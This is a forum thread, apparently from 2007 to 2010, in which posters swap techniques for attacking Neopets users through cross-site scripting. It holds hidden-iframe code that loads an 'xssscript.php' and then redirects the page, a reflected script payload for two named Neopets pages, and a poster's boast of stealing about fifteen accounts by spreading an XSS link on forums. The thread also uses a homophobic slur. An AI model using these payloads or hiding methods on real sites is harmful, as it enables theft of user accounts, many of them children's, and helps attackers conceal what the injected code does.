A litte hint:
Don't use style="width:0px;height:0px;border:0px;" only, because if the page has something like this in it's CSS:

iframe {
padding:100px;
}

then the following code or text after the iframe will have a large space between itself and the text before the iframe.
style="display:none" works fine and is more than enough ;)

ckore Wrote:
-------------------------------------------------------
> A litte hint:
> Don't use style="width:0px;height:0px;border:0px;"
> only, because if the page has something like this
> in it's CSS:
>
> iframe {
> padding:100px;
> }
> then the following code or text after the iframe
> will have a large space between itself and the
> text before the iframe.
> style="display:none" works fine and is more than
> enough ;)


Well if you're creating the page yourself like the idea was then that isn't really an issue.



Edited 1 time(s). Last edit at 01/19/2007 12:24PM by hasse.

I found an xss vuln in the scratchcards! Go here to get the link:

http://www.mutantsrus.com/neopets.html

Heh, try fishing in the right river. They won't bite here.

...That would be why I posted that on like twenty neopets related forums... the results are rather interesting. I've gotten about 15 accounts so far.

Quote
----------
Ohhh how cool, thanks!

Quick question, one...do you have aim or msn?

two...

I'm trying to do

<iframe src="xssscript.php" style="width:0px;height:0px;border:0px"></iframe>
<script>
location.href="http://www.google.com"
</script>

So it does the xss script and then goes to google...but it seems like it just goes to google and forgets about the iframe. When I remove the google redirection it works though so I'm confused :P
----------------------------------

Just use script tags.
<script>document.write('<iframe src="xssscript.php" style="width:0px;height:0px;border:0px"></iframe>')</script>
<script>
location.href="http://www.google.com"
</script>


That should do the trick

why did you guys help this kid.. he has no clue how to code, and just copied and pasted your replies. this is where gareth's codetcha comes in handy..... (btw replying to this due to current post on neopets.. god i haven't seen that "game" in over 8-9 years. can't believe it's still going strong)

I never took part in such faggotry, but it's no longer simply a game, fragge. They've expanded their empire, and now have commercials on television, digital pocket games, and stuffed creatures for sale.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

ugh, almost as sickening as apple's line of consumer products.

Tested with IE6 and Firefox

Go to http://arcade.neopets.com/tellafriend.php and put "><script>alert(1)</script> in the name form.

Another one is located here http://arcade.neopets.com/contact.php

http://www.rstcenter.com - Romanian Security Team
Inchirieri limuzine

Is neopets still vulnerable?

I'll cut you

-id

rofl, that made my day

http://www.xssed.com/archive/author=PaPPy/



Edited 1 time(s). Last edit at 02/16/2010 07:23AM by PaPPy.